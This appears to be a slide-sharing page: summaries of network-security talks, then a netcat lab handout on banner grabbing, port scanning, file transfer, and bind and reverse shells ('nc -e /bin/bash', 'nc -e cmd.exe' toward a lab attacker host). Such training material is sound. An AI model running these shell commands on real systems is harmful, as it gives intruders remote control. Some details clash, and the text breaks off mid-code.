Netcat (nc) is a networking utility that can be used to transfer files, run commands remotely, and scan ports on remote systems. It allows establishing TCP and UDP connections to ports on remote systems. The document provides examples of using nc to scan ports, transfer files between systems, set up reverse shells, and perform basic network tasks and administration. Google dorking techniques are also presented for searching websites and finding specific pages or files using keywords, titles, and URLs. The Whois tool is demonstrated to query registration records for domain names and obtain information like registrar, IP address, and name servers.
The document discusses the nmap scanning tool and provides examples of using its basic scanning options. Nmap can scan for open ports on TCP, UDP, and other protocols. It can detect operating systems, banner grab services to identify software versions, and has options for port scanning, ping scanning entire networks, and more. Scripting options allow tasks like brute force attempts, information gathering, and vulnerability scanning.
The document discusses hacking the Swisscom modem by exploiting default credentials to gain access. Upon login, the author runs commands to investigate the system such as viewing configuration files and mapping the internal network. Various system details are discovered including the Linux kernel version and software components.
True stories on the analysis of network activity using Python - delimitry
The document discusses network packet analysis using Python. It provides an overview of network analysis tools like Wireshark and tcpdump, and how to use them to analyze network traffic captured in a pcap file. It also discusses how to create and send network packets using Scapy for tasks like port scanning, and how to filter network traffic using IPv4/IPv6 packet filters like iptables. The document provides examples of summarizing pcap data and crafting network packets for various protocols.
How HeadHunter managed to safely violate RFC 793 (TCP) and bypass network ... - Андрей Шорин
At some point the world's 3rd-largest job site began to go down periodically for several minutes. The surprise was that this time it really was because of the network.
To scale its services and their interaction with each other, hh.ru uses an internal load balancer. 25 thousand requests per second are handled by 5 servers running nginx. Requests to these servers are balanced by a switch.
I will describe how we investigated a series of incidents caused by a violation of the TCP protocol during load balancing, and what we came up with so that we could keep violating it with impunity.
How HeadHunter managed to safely violate RFC 793 (TCP) and bypass network ... - Ontico
At some point the world's 3rd-largest job site began to go down periodically for several minutes. The surprise was that this time it really was because of the network.
To scale its services and their interaction with each other, hh.ru uses an internal load balancer. 25 thousand requests per second are handled by 5 servers running nginx. Requests to these servers are balanced by a switch.
I will describe how we investigated a series of incidents caused by a violation of the TCP protocol during load balancing, and what we came up with so that we could keep violating it with impunity.
The presentation addresses the most typical issues during network software development and testing, explains the causes and suggests solutions:
- overlapping IP networks
- invalid netmasks
- incomplete routing configuration
- incorrect local MAC addresses
- unidirectional packet generator and unicast flood
- disabled ethernet auto negotiation
Modern CPUs use various techniques to improve performance, such as instruction pipelining, cache memory, superscalar execution, out-of-order execution, speculative execution, and branch prediction. However, these optimizations can introduce security vulnerabilities such as the Spectre and Meltdown attacks, which exploit side effects of speculative execution in the CPU cache to leak secret data from memory. Speculative execution may process instructions before a branch is resolved, potentially loading secret data into the cache, where an attacker can detect it using precise timing measurements. While fixes have been developed, fully mitigating these issues remains an ongoing challenge for CPU architecture.
The document discusses reverse engineering the firmware of Swisscom's Centro Grande modems. It identifies several vulnerabilities found, including a command overflow issue that allows complete control of the device by exceeding the input buffer, and multiple buffer overflow issues that can be exploited to execute code remotely by crafting specially formatted XML files. Details are provided on the exploitation techniques and timeline of coordination with Swisscom to address the vulnerabilities.
The document discusses an offline brute force attack method against the WiFi Protected Setup (WPS) protocol. It explains that many wireless access points and routers use weak pseudo-random number generators with small states that can be recovered, allowing an attacker to determine the nonces used in the WPS handshake and then brute force the PIN offline. It provides details on how the attack would work by recovering the PRNG state from the initial message and then determining the PIN. Vendors are shown to have weak responses or lack of acknowledgment of the issue, which affects many chipset and product brands that use a common reference implementation.
This document discusses various port scanning techniques used by hackers to discover services, operating systems, and open ports on target hosts. It explains common TCP scans like SYN scans which identify open and closed ports, and UDP scans. Timing options and techniques for hiding scans are also covered. The document provides examples of using the Nmap tool to perform scans and identify operating systems.
This document outlines a presentation on how a hacker views a website. It includes sections on introduction, demonstration, tools, CERT-FR, and questions. Tools mentioned include nmap, netdiscover, Wpscan, nessus, nikto, John, Burp, metasploit, sqlmap, and Github for information gathering, vulnerability assessment, and exploitation. It recommends checking the CERT-FR website and following their Twitter account for security advisories.
The document discusses various scan types available in the nmap port scanner program. It describes TCP connect scans which actively connect to ports, SYN stealth scans which send SYN packets to identify open and closed ports without fully establishing connections, and less common FIN, NULL and XMAS scans. It also covers ping scans to identify online systems, UDP scans, and options for customizing scans to avoid detection like altering timing and using decoys. The goal is to help users understand different scan techniques and how to choose scans suited to different target types or detection avoidance needs.
The document discusses various Linux network configuration and troubleshooting commands, including ifconfig for configuring network interfaces and viewing network settings, ping for testing network connectivity, traceroute for tracing the network route to a destination, and commands like netstat, dig, nslookup, route, host, arp, ethtool, iwconfig, and hostname for additional network tasks and information retrieval. It provides examples and brief explanations of how to use each command.
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics - Bishop Fox
Learn the basics of network penetration testing success - an introduction to the top three tools that will help you on your security journey: Nmap, Netcat, and Metasploit. See how to use Nmap both for port scanning and vulnerability discovery. You'll also learn how to use Netcat to grab banners, make HTTP requests, and create both reverse and bind shells. Finally, we’ll learn the ins and outs of Metasploit, including how to integrate our Nmap scan results for even more ownage and using the built-in exploits to get shells.
At the end of this, you will be port scanning, creating payloads, and popping shells. This technical workshop is designed to familiarize you with the necessary tools to continue your ethical hacking journey. From here, take your l33t new skillz and apply them to Capture The Flag (CTF) competitions or scanning your home network for vulnerabilities.
(This was originally presented on February 22, 2010 at Day of Shecurity Boston 2019).
This document provides an overview and agenda for a training on the Nmap Scripting Engine (NSE). It begins with a 10 minute introduction to Nmap, covering what Nmap is used for and some basic scan options. Next, it spends 20 minutes reviewing the existing NSE script categories and how to use available scripts, demonstrating two sample scripts. Finally, it dedicates 20 minutes to explaining how to write your own NSE script, including the basic structure and providing an example of writing a script to find the website title.
Kernel Recipes 2017 - Modern Key Management with GPG - Werner Koch - Anne Nicolas
Although GnuPG 2 has been around for nearly 15 years, the old 1.4 version was still in wide use. With Debian and others making 2.1 the default, many interesting things can now be done. In this talk he will explain the advantages of modern key algorithms, like ed25519, and why gpg relaxed some of its more paranoid defaults. The new --quick commands of gpg for easily scriptable key management will be described, as well as the new key discovery methods. Finally, hints for integrating gpg into other programs will be given.
Werner Koch, g10code
Imagine you're tackling one of these evasive performance issues in the field, and your go-to monitoring checklist doesn't seem to cut it. There are plenty of suspects, but they are moving around rapidly and you need more logs, more data, more in-depth information to make a diagnosis. Maybe you've heard about DTrace, or even used it, and are yearning for a similar toolkit, which can plug dynamic tracing into a system that wasn't prepared or instrumented in any way.
Hopefully, you won't have to yearn for a lot longer. eBPF (extended Berkeley Packet Filters) is a kernel technology that enables a plethora of diagnostic scenarios by introducing dynamic, safe, low-overhead, efficient programs that run in the context of your live kernel. Sure, BPF programs can attach to sockets; but more interestingly, they can attach to kprobes and uprobes, static kernel tracepoints, and even user-mode static probes. And modern BPF programs have access to a wide set of instructions and data structures, which means you can collect valuable information and analyze it on-the-fly, without spilling it to huge files and reading them from user space.
In this talk, we will introduce BCC, the BPF Compiler Collection, which is an open set of tools and libraries for dynamic tracing on Linux. Some tools are easy and ready to use, such as execsnoop, fileslower, and memleak. Other tools such as trace and argdist require more sophistication and can be used as a Swiss Army knife for a variety of scenarios. We will spend most of the time demonstrating the power of modern dynamic tracing -- from memory leaks to static probes in Ruby, Node, and Java programs, from slow file I/O to monitoring network traffic. Finally, we will discuss building our own tools using the Python and Lua bindings to BCC, and its LLVM backend.
The document describes the configuration of a Dynamic Multipoint Virtual Private Network (DMVPN) using three phases. Phase 1 establishes IPsec and IKE tunnels between the hub router and spoke routers using EIGRP routing. Phase 2 optimizes the configuration by removing split horizon and enabling next hop self. Phase 3 enables features like NHRP redirect and shortcut to optimize network traffic flow.
The document discusses server-side request forgery (SSRF) vulnerabilities and techniques for exploiting and bypassing URL parsing issues to achieve protocol smuggling. It provides examples of exploiting URL parsers in various programming languages to conduct CR-LF injection and host/path injection. It also demonstrates abusing features of Glibc NSS and protocols like HTTPS to smuggle protocols over TLS SNI or bypass patches. The talk appears to be about advanced SSRF attacks and protocol smuggling techniques.
Tomas Hlavacek - IP fragmentation attack on DNS - DefconRussia
This document summarizes an IP fragmentation attack on DNS resolvers. It exploits IP fragmentation and reassembly to reduce the entropy for cache poisoning from 32 bits to 16 bits. There are two types of attacks: one triggers fragmentation through spoofed ICMP messages, while the other registers a specially crafted zone to generate oversized responses. The attacks allow modifying DNS response fragments off-path to poison caches. Defenses include DNSSEC and workarounds like ignoring certain ICMP messages and limiting response sizes.
NMAP is a network scanning tool that can perform various types of scans, including port scans, version detection scans, and OS detection scans. It has many options to control the type and timing of scans. The document provides details on NMAP scan types like TCP SYN scans, ping scans using different packet types, and port scanning techniques. It also covers topics like port states, common ports, scan timing and output options.
The document discusses dynamic port scanning (DPS), which integrates ARP poisoning into port scanning to dynamically spoof the source IP address of scan packets. DPS works by poisoning the ARP cache of the target host or gateway so that scan replies are delivered to the scanning machine regardless of the spoofed source IP. This allows the scan to appear as if it is coming from many machines, improving stealth, while still obtaining results unlike traditional IP spoofing techniques. The document outlines how DPS works, current spoofing methods, advantages over other techniques, and limitations.
This document summarizes key aspects of Unicode and security issues related to Unicode encoding. It discusses the history of character encodings like ASCII and EBCDIC, the role of the Unicode Consortium, and algorithms in the Unicode standard like normalization, collation, and case folding. It also highlights potential security issues like lookalike characters, right-to-left override, non-characters, and normalization forms that can bypass filters or cause buffer overflows.
Nmap: not only a port scanner, by Ravi Rajput - ComExpo security awareness meet - Ravi Rajput
As every coin has two sides, in the same way we know only a single side of Nmap, which is port scanning.
While researching I found that a lot more than port scanning and banner grabbing can be done with the use of Nmap.
We can use Nmap for web application pen-testing and exploitation too. Yeah, it won't work as efficiently as MSF.
This can replace the use of Acunetix and other paid scanners.
This document provides information on various debugging and profiling tools that can be used for Ruby including:
- lsof to list open files for a process
- strace to trace system calls and signals
- tcpdump to dump network traffic
- Google perftools profiler for CPU profiling
- pprof to analyze profiling data
It also discusses how some of these tools have helped identify specific performance issues with Ruby like excessive calls to sigprocmask and memcpy calls slowing down EventMachine with threads.
Networking in Linux discusses DNS related commands in Linux. It begins by listing DNS concepts like zones and records. It then demonstrates commands like nslookup, host and dig to query DNS records like A, MX, NS, SOA records and perform operations like reverse lookups. It shows how to use specific nameservers, change ports and timeouts. The document provides examples of using these tools to troubleshoot DNS issues like propagation.
This document contains cheat sheets and code snippets for penetration testing. It covers topics like recon, DNS enumeration, Nmap scanning, Netcat, SNMP, MySQL, MSSQL, web enumeration, RDP exploitation, file inclusion, XSS, SQL injection, and post-exploitation techniques for Linux and Windows. The document is intended to help penetration testers and those studying for the OSCP certification by providing examples for common tasks without relying on Metasploit.
DEF CON 27 - HUBER AND ROSKOSCH - I'm on your phone listening attacking voip c... - Felipe Prado
The document discusses findings from analyzing the web interfaces and firmware of various VoIP phone models. Several vulnerabilities were found, including:
- Cross-site scripting (XSS) in AudioCodes 405HD phone web interface allowing injection of scripts
- Information leakage in Gigaset Maxwell Basic phone web interface revealing if an admin is logged in
- Authentication bypass in Gigaset Maxwell Basic phone by manipulating the session token
The methodology involved analyzing phone web traffic, extracting and emulating firmware, and investigating code like PHP files. Many phones were found to have weaknesses in their cryptography implementation or use of plaintext credentials.
This document provides an overview of a presentation on Linux networking. The agenda includes topics like ARP, interface manipulation, network troubleshooting, routing, network bonding, network namespaces, kernel network parameters, and interview questions. It notes that the presentation will demonstrate over 30 commands related to networking and that there are often multiple ways to solve exercises. It encourages asking questions to aid learning.
This document provides an overview of a presentation on Linux networking. The agenda includes topics like ARP, interface manipulation, network troubleshooting, routing, network bonding, network namespaces, kernel network parameters, and interview questions. It notes that the presentation will demonstrate over 30 commands related to networking and that there are often multiple ways to solve exercises. It encourages asking questions to aid learning.
Matt Batten (sleepZ3R0) spoke at BSIDES AUGUSTA and BSIDES RDU these are our slides. Hope you can learn and benefit from them. If you have any questions feel free to send us messages on twitter we will always respond.
Network Test Automation - Net Ops Coding 2015Hiroshi Ota
1. The document discusses network test automation using tools like Serverspec, Infrataster, Lbspec, and Rspec-ssltls to test network configurations and connectivity. These tools use Ruby and RSpec to test servers, DNS, firewalls, load balancers, and SSL/TLS without requiring changes to production systems.
2. Examples are provided showing how to test server reachability, DNS entries, firewall rules, load balancer behavior, and SSL/TLS settings using the different tools. Tests can be run to check configurations without affecting live networks.
3. Running the RSpec tests produces results indicating how many examples passed and failed, allowing engineers to test network changes with confidence before deploying
Konfigurasi Server Gateway dengan fitur PROXY, WEBSERVER dan DHCPWalid Umar
This document provides instructions for completing a competency test on networking skills. It details how to:
1) Plan a network topology with a server, gateway, and client devices.
2) Perform subnetting calculations to divide IP addresses into public and private networks.
3) Assemble and install a Debian server, configure networking and services like DHCP, Apache, and Squid proxy server.
4) Configure the router and firewall rules for network address translation and proxy access.
EBU DRW 2011 - CRC-mmbTools - Software Radio WorkshopPascal Charest
The document provides an overview of the CRC-mmbTools software suite for digital radio broadcasting. It discusses:
1. The CRC-mmbTools live CD and website, which contain various open-source tools for DAB/DAB+ broadcasting.
2. How to use the major tools - CRC-OpenMokast, CRC-DabMod, CRC-Dwap, and CRC-DabMux - including examples of basic and complex configurations.
3. How the tools support different types of service encoding for audio and multimedia content.
4. An overview of how the tools can be used for other modulations like FM and DRM broadcasting in addition to DAB
This document provides an overview of various networking tools in Linux, including commands for network configuration (ifconfig, route), connectivity testing (ping, traceroute), name resolution (host, nslookup), port and protocol inspection (netstat, tcpdump), and secure remote access (SSH, PuTTY). It also covers tools for firewall management (ufw), network mapping (Nmap), raw socket programming (netcat), link status (ethtool), and more. Examples are given for common tasks like viewing routing tables, capturing packets, remotely controlling systems, and accessing services over Telnet versus SSH. A references section at the end provides additional learning resources.
Network scanning with Nmap for Noobs and Ninjas - This slide was presented at Null Delhi monthly security meet by Nikhil and Jayvardhan.
https://www.facebook.com/nullOwaspDelhi/
The document discusses using Nmap to perform network scanning and reconnaissance. It provides an overview of Nmap, describing common scan types like TCP and UDP scans. It also covers useful Nmap options for tasks like service and operating system detection. The document demonstrates the Nmap Scripting Engine for tasks like vulnerability scanning and brute force attacks. It provides examples of commands for different scan types and scripts.
This document discusses home automation and the r-house gem. It provides an overview of home automation categories like lighting, climate and appliances. It also summarizes the r-house architecture which includes components like the interceptor, devices, and database. Finally, it demonstrates how to initialize and connect the interceptor component and register events using the r-house gem.
This document provides an overview of how to contribute to the cPython source code. It discusses running benchmarks to understand performance differences between loops inside and outside functions. It encourages contributing to improve coding skills and help the open source community. The steps outlined are to clone the cPython source code repository, resolve any dependencies during building, review open issues on bugs.python.org, and work on resolving issues - starting with easier ones. Tips are provided such as commenting when taking ownership of an issue, reproducing bugs before working on them, writing tests for code changes, and updating documentation.
This document discusses various techniques for advanced network forensics, including user/password cracking using Hydra, port scanning using Nmap, signature detection by analyzing file types in network payloads, and detecting converted file formats like MIME encoding. It provides examples of using tools like Hydra, Nmap, and Snort rules to detect activities like password cracking, port scanning, and the transmission of files like PDFs and images over the network.
The document provides instructions on how to configure an SSH server on Linux, perform footprinting and reconnaissance, scanning tools and techniques, enumeration tools and techniques, password cracking techniques and tools, privilege escalation methods, and keylogging and hidden file techniques. It discusses active and passive footprinting, Nmap port scanning, NetBIOS and SNMP enumeration, Windows password hashes, the sticky keys method for privilege escalation, ActualSpy keylogging software, and hiding files using NTFS alternate data streams. Countermeasures for many of these techniques are also outlined.
Jaime Piña, @variadico, Software Engineer at Apcera
Microservice issues are networking issues. Fixing code in your app is easy, but the hard part of using microservices is the networking. How do you actually know if you're sending what you think you are? Why does this request fail in my app, but not when I use curl? Is this service very slow or is it up at all?
This talk will help demystify some common problems you might experience while building out your collection of microservices. Once you can find the issue, it becomes way easier to fix.
Filip palian mateuszkocielski. simplest ownage human observed… routersYury Chemerkin
This document discusses identifying and exploiting vulnerabilities in consumer routers. It provides examples of analyzing firmware from various router models, including the (--E)-LINK DIR-120 and DIR-300, to gain unauthorized access. Methods discussed include reverse engineering firmware, exploiting services like telnet that are exposed without authentication, and modifying the read-only filesystem. The document also talks about using these compromised routers as bots for botnets performing activities like DDoS attacks, cryptocurrency mining, and spam/phishing campaigns. It provides examples of real botnets like Psyb0t that have exploited routers.
Rete di casa e raspberry pi - Home network and Raspberry Pi Daniele Albrizio
The document discusses setting up a Raspberry Pi 3 to improve home network privacy and security. It describes installing Kali Linux on the Raspberry Pi and configuring it with NAT, DHCP, and an access point to monitor network traffic. It also covers using Pi-hole for ad blocking and tools like Wireshark for sniffing and analyzing traffic patterns on the home network. The goal is to gain more visibility and control over devices connected to the network to limit information leakage and unauthorized behavior.
In this slide, I introduced how Gameboy works and how to build a Gameboy emulator using Rust programming language. Also, I introduce how to migrate the Rust emulator to Webassembly, so that we can run the emulator using browser.
Video of presentation of this slide:
https://www.youtube.com/watch?v=LqcEg3IVziQ
Este documento discute os principais desafios de segurança da informação no ambiente global, incluindo a guerra cibernética, a internet das coisas, espionagem digital, BYOD e engenharia social. Apresenta também as informações disponíveis no underground hacker e as ferramentas usadas em ataques, como redes anônimas e técnicas de engenharia social.
O documento apresenta um curso introdutório sobre redes de computadores e a Internet. Seu objetivo geral é fornecer aos estudantes um conceito geral sobre como as redes funcionam e as tecnologias envolvidas, abordando tópicos como estrutura da Internet, protocolos, serviços, camadas, história e conceitos fundamentais como borda, núcleo e acesso à rede.
O documento descreve a ferramenta AdminDeviceLan para bloqueio de dispositivos de entrada e saída em computadores. A ferramenta possui módulos cliente e servidor e permite bloquear dispositivos como CD-ROM, disquetes e pendrives em uma ou mais máquinas de forma remota. O tutorial mostra como instalar os módulos, conectar o cliente ao servidor e aplicar regras de bloqueio em um computador de exemplo.
[1] O documento apresenta um tutorial sobre como utilizar a ferramenta TrueCrypt para criptografar arquivos e dispositivos, incluindo a criação de pastas criptografadas, instalação do idioma português e criptografia de partições e pendrives.
[2] É demonstrado o download e instalação do TrueCrypt e do pacote de idioma português, assim como a criação e montagem de um contêiner criptografado para armazenar arquivos secretos.
[3] Também é mostrado como preparar um pend
[1] O documento apresenta um trabalho sobre Group Policy Objects (GPO) realizado por Alex Sandro Bastos, Cristiano Carvalho e Patricia Gonçalves para a disciplina de Sistemas de Controle de Acesso da pós-graduação em Segurança de Redes de Computadores da Universidade Estácio de Sá sob a orientação do professor Cassio Ramos. [2] O trabalho descreve o que são GPOs, como funcionam, como criar políticas de grupo no Active Directory e exemplos práticos de configurações de políticas de segurança que podem ser aplicadas em um
O documento apresenta técnicas de tunelamento para bypassar proteções como proxies, incluindo o uso de HTTP Tunnel (htc e hts), HTTP CONNECT Tunneling, ProxyTunnel e SSH Tunnel para acesso remoto, e ICMP Tunnel (ptunnel). Vários exemplos são dados para ilustrar como configurar cada técnica em diferentes cenários.
O documento fornece um tutorial passo-a-passo sobre como usar o TrueCrypt para criptografar arquivos e discos rígidos de forma segura. Ele explica como criar um volume criptografado, montá-lo e desmontá-lo, bem como configurar um disco removível criptografado e criptografar todo o disco rígido do computador.
1) O documento descreve as funcionalidades do firewall Endian Firewall Community Edition, incluindo configuração de proxy web, filtragem de conteúdo, antivírus e regras de firewall.
2) É possível habilitar proxy para HTTP, POP3 e DNS, além de configurar filtragem de conteúdo com base em palavras-chave, URLs e categorias.
3) O firewall possui interface para configurar regras de saída, encaminhamento de portas e servidor DHCP.
Este documento descreve como criar chaves PGP usando o GNU Privacy Guard (GPG) nos sistemas operacionais Windows XP e Linux Ubuntu. Ele explica como gerar chaves, exportar e importar chaves públicas entre os sistemas, e criptografar/descriptografar arquivos usando as chaves.
Este documento apresenta uma introdução ao curso de Segurança Linux e aborda tópicos como hardening do sistema operacional, rede e serviços, criptografia e tunning do kernel para fortalecimento da segurança.
O documento discute como os sistemas RFID funcionam e como eles podem ser vulneráveis à interceptação de dados. Explica que os campos eletromagnéticos transmitem informações entre leitores e etiquetas RFID, e que esses dados podem ser capturados por dispositivos que detectam esses campos. Isso permite clonar etiquetas RFID e obter acesso não autorizado a sistemas que usam RFID.
O documento fornece uma introdução à tecnologia RFID, explicando seu funcionamento baseado em campos eletromagnéticos e as informações que podem ser armazenadas. Também discute brevemente a evolução histórica dos códigos de barras para as etiquetas eletrônicas RFID e identifica algumas vulnerabilidades de segurança destas últimas que serão exploradas no próximo artigo.
O documento descreve vários tipos de ataques à aplicações web, incluindo roubo de sessões, XSS, XSRF, SQL Injection, traversal de diretório e overflows. Ele fornece exemplos de como esses ataques funcionam na prática e como podem ser realizados usando a aplicação Google Gruyere, que foi propositalmente desenvolvida com vulnerabilidades para fins educacionais.
O documento discute técnicas para permanecer anônimo na internet, incluindo navegação via servidores proxy, Tor e VPN. Também aborda formas de realizar ataques de hacking de forma anônima, como o Idle Scan e o uso de botnets. O documento inclui demonstrações práticas destas técnicas.
O documento apresenta um seminário sobre engenharia social, definindo-a como a arte de hackear pessoas por meio de enganação para obter informações confidenciais. Apresenta exemplos de como isso é feito, ferramentas usadas como sites de busca, mídias sociais e equipamentos de espionagem, e conclui convidando para debate.
Este documento apresenta um tutorial sobre como usar o software Maltego para realizar data mining e obter informações sobre uma pessoa a partir de seu email. Ele explica como escolher um email aleatório, pesquisar por outros emails, domínios e informações relacionadas usando as ferramentas do Maltego. O tutorial destaca como organizar as informações coletadas em um log para direcionar as buscas.
O documento descreve um curso de ética hacker com a ferramenta Backtrack, com 32 horas de duração sobre 4 sábados. O curso ensinará técnicas de hacking ético como reconhecimento de rede, port scanning, exploração de vulnerabilidades e engenharia social usando ferramentas como Nmap, Metasploit e SET.
This document provides a network diagram of a lab perimeter. It shows a Debian host connected to both a host only network at 172.16.50.0/24 and a NAT/VMware network at 172.16.49.0/24. A virtual machine called SW-virtual is connected to the NAT/VMware network and has an IP of 172.16.49.100.
O documento discute as principais topologias de rede: barramento, estrela e anel. No barramento todos os computadores são ligados por um único cabo. Na estrela cada computador é ligado a um ponto central. No anel a ligação física é em estrela e a lógica em anel. As topologias afetam a capacidade, gerenciamento e crescimento da rede.
Offensive Security Course Lab
Netcat and Enumeration (Google Hacking, Whois and DNS)
1. NETCAT
a) Help
root@bt:~/lab_bash-script# nc -h
[v1.10-38]
connect to somewhere:   nc [-options] hostname port[s] [ports] ...
listen for inbound:     nc -l -p port [-options] [hostname] [port]
options:
        -c shell commands       as `-e'; use /bin/sh to exec [dangerous!!]
        -e filename             program to exec after connect [dangerous!!]
        -b                      allow broadcasts
        -g gateway              source-routing hop point[s], up to 8
        -G num                  source-routing pointer: 4, 8, 12, ...
        -h                      this cruft
        -i secs                 delay interval for lines sent, ports scanned
        -k                      set keepalive option on socket
        -l                      listen mode, for inbound connects
        -n                      numeric-only IP addresses, no DNS
        -o file                 hex dump of traffic
        -p port                 local port number
        -r                      randomize local and remote ports
        -q secs                 quit after EOF on stdin and delay of secs
        -s addr                 local source address
        -T tos                  set Type Of Service
        -t                      answer TELNET negotiation
        -u                      UDP mode
        -v                      verbose [use twice to be more verbose]
        -w secs                 timeout for connects and final net reads
        -z                      zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. 'ftp\-data').
root@bt:~/lab_bash-script#
Solution Consultoria e Treinamento
www.solution-rj.com.br
Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ.
Email: solution@solution-rj.com.br/Tel: 021 8732-9993
1
b) Banner grabbing
Checking open ports and reading banners
root@bt:~/lab_bash-script# nc -nv 172.16.49.100 21
(UNKNOWN) [172.16.49.100] 21 (ftp) open
220 (vsFTPd 2.3.0)
root@bt:~/lab_bash-script# nc -nv 172.16.49.100 80
(UNKNOWN) [172.16.49.100] 80 (www) open
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Wed, 20 Jun 2012 22:01:42 GMT
Server: Apache/2.2.16 (Ubuntu)
Last-Modified: Wed, 20 Jun 2012 21:57:24 GMT
ETag: "c5af2-b1-4c2ee7bee7e05"
Accept-Ranges: bytes
Content-Length: 177
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
c) Simple chat
On BackTrack
nc -lvp 4444
On Windows XP SP2
nc -nv 172.16.49.130 4444
Just type anything on either machine
d) Remote administration
- BIND SHELL
On the BT machine on the external network
root@bt:~# nc -lvp 4444 -e /bin/bash
listening on [any] 4444 ...
On the Windows XP SP2 machine on the internal network
C:\>nc -nv 172.16.49.130 4444
(UNKNOWN) [172.16.49.130] 4444 (?) open
ls
Desktop
lab_bash-script
rota.sh
- REVERSE SHELL – NC
On the BT machine on the external network
root@bt:~# nc -lvp 4444
listening on [any] 4444 ...
On the Windows XP SP2 machine on the internal network
C:\>nc -nv 172.16.49.130 4444 -e cmd.exe
(UNKNOWN) [172.16.49.130] 4444 (?) open
Result on BT
root@bt:~# nc -lvp 4444
listening on [any] 4444 ...
172.16.50.10: inverse host lookup failed: Unknown server error : Connection timed out
connect to [172.16.49.130] from (UNKNOWN) [172.16.50.10] 1214
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\>hostname
hostname
CTP028
C:\>
e) Port Scan
External BT scanning the firewall (ports 21 to 30)
root@bt:~# nc -z -nvv -w 1 172.16.49.100 21-30
(UNKNOWN) [172.16.49.100] 30 (?) : Connection refused
(UNKNOWN) [172.16.49.100] 29 (?) : Connection refused
(UNKNOWN) [172.16.49.100] 28 (?) : Connection refused
(UNKNOWN) [172.16.49.100] 27 (?) : Connection refused
(UNKNOWN) [172.16.49.100] 26 (?) : Connection refused
(UNKNOWN) [172.16.49.100] 25 (smtp) : Connection refused
(UNKNOWN) [172.16.49.100] 24 (?) : Connection refused
(UNKNOWN) [172.16.49.100] 23 (telnet) : Connection refused
(UNKNOWN) [172.16.49.100] 22 (ssh) open
(UNKNOWN) [172.16.49.100] 21 (ftp) open
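As an added example (not code from the lab handout), the banner grab of b) and the zero-I/O scan of e) reproduced in Python: probe_port() connects, optionally sends a request such as the HEAD line typed above, and reads the banner; scan_range() only connects and classifies each port as open or refused, as nc -z does. start_fake_service() and free_port() are constructed local stand-ins for the 172.16.49.100 targets so the script runs offline.

```python
import socket
import threading

# Added example, not code from the lab: an nc-style TCP prober. probe_port() mirrors
# "nc -nv host port" (connect, optionally send a request such as "HEAD / HTTP/1.0",
# read the banner); scan_range() mirrors "nc -z -w 1 host lo-hi" (connect only).


def probe_port(host, port, timeout=1.0, probe=b"", read_banner=True):
    """Return (state, banner). state is "open", "refused", "timeout" or "error",
    the same distinctions nc -v prints. The banner is whatever the service sends
    before it closes or the timeout expires, decoded loosely and stripped."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            if not read_banner:
                return "open", ""          # zero-I/O mode: the connect is the result
            if probe:
                s.sendall(probe)           # the request you would type into nc
            s.settimeout(timeout)
            chunks = []
            while True:
                try:
                    data = s.recv(4096)
                except socket.timeout:
                    break                  # open but quiet: report what we have
                if not data:
                    break                  # peer closed: banner complete
                chunks.append(data)
            return "open", b"".join(chunks).decode("utf-8", "replace").strip()
    except ConnectionRefusedError:
        return "refused", ""               # nothing listening (RST), as nc reports
    except socket.timeout:
        return "timeout", ""               # no reply at all, typically filtered
    except OSError:
        return "error", ""                 # unreachable network, bad address, ...


def scan_range(host, lo, hi, timeout=1.0):
    """Zero-I/O scan of lo..hi inclusive; returns {port: state}."""
    return {p: probe_port(host, p, timeout, read_banner=False)[0]
            for p in range(lo, hi + 1)}


def start_fake_service(banner, wait_for_request=False):
    """Constructed stand-in for the lab's FTP/HTTP targets: listens on an
    ephemeral 127.0.0.1 port, sends `banner` to every client, then hangs up.
    With wait_for_request=True it reads the client's request first, as an
    HTTP server does. Returns the port number."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        while True:
            conn, _ = srv.accept()
            try:
                with conn:
                    if wait_for_request:
                        conn.recv(1024)
                    conn.sendall(banner)
            except OSError:
                pass  # client hung up early (a -z style probe does that)

    threading.Thread(target=serve, daemon=True).start()
    return port


def free_port():
    """A port with nothing listening, for the "refused" case: bind to 0, note
    the port the kernel chose, close it again."""
    with socket.socket() as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


if __name__ == "__main__":
    ftp = start_fake_service(b"220 (vsFTPd 2.3.0)\r\n")
    print(ftp, probe_port("127.0.0.1", ftp))
    http = start_fake_service(
        b"HTTP/1.1 200 OK\r\nServer: Apache/2.2.16 (Ubuntu)\r\n\r\n", wait_for_request=True)
    print(http, probe_port("127.0.0.1", http, probe=b"HEAD / HTTP/1.0\r\n\r\n"))
    closed = free_port()
    for port, state in {**scan_range("127.0.0.1", ftp, ftp),
                        **scan_range("127.0.0.1", closed, closed)}.items():
        print(f"[127.0.0.1] {port} : {state}")   # the shape of nc -z -nvv output
```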
f) File transfer
External BT listening on port 4444 to receive the file
root@bt:~# nc -lvp 4444 > output.txt
listening on [any] 4444 ...
172.16.50.10: inverse host lookup failed: Unknown server error : Connection timed out
connect to [172.16.49.130] from (UNKNOWN) [172.16.50.10] 1224
On Windows XP SP2 on the internal network
C:\>nc.exe -nv 172.16.49.130 4444 < arq1.txt
(UNKNOWN) [172.16.49.130] 4444 (?) open
Result
root@bt:~# ls
Desktop lab_bash-script output.txt rota.sh
root@bt:~# more output.txt
teste de transferencia
root@bt:~#
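Added example, not the course's code: the listener/sender pair above rebuilt in Python with a SHA-256 digest computed independently on each end, so the receiver can tell a complete transfer from one cut short or altered on the way, which nc alone cannot. The file name arq1.txt and its contents are constructed from the slide.

```python
import hashlib
import socket
import tempfile
import threading
from pathlib import Path

# Added example, not the lab's code: "nc -lvp 4444 > output.txt" (listener) and
# "nc -nv host 4444 < arq1.txt" (sender) rebuilt in Python. Each side hashes the
# bytes it handled; compare the two digests and a truncated or modified transfer
# shows up instead of silently leaving a wrong output.txt behind.


def listen_on(bind_addr="127.0.0.1", port=0):
    """Create the listening socket first (like nc -l -p) so the sender cannot
    connect before we are ready; port=0 lets the kernel pick a free one."""
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
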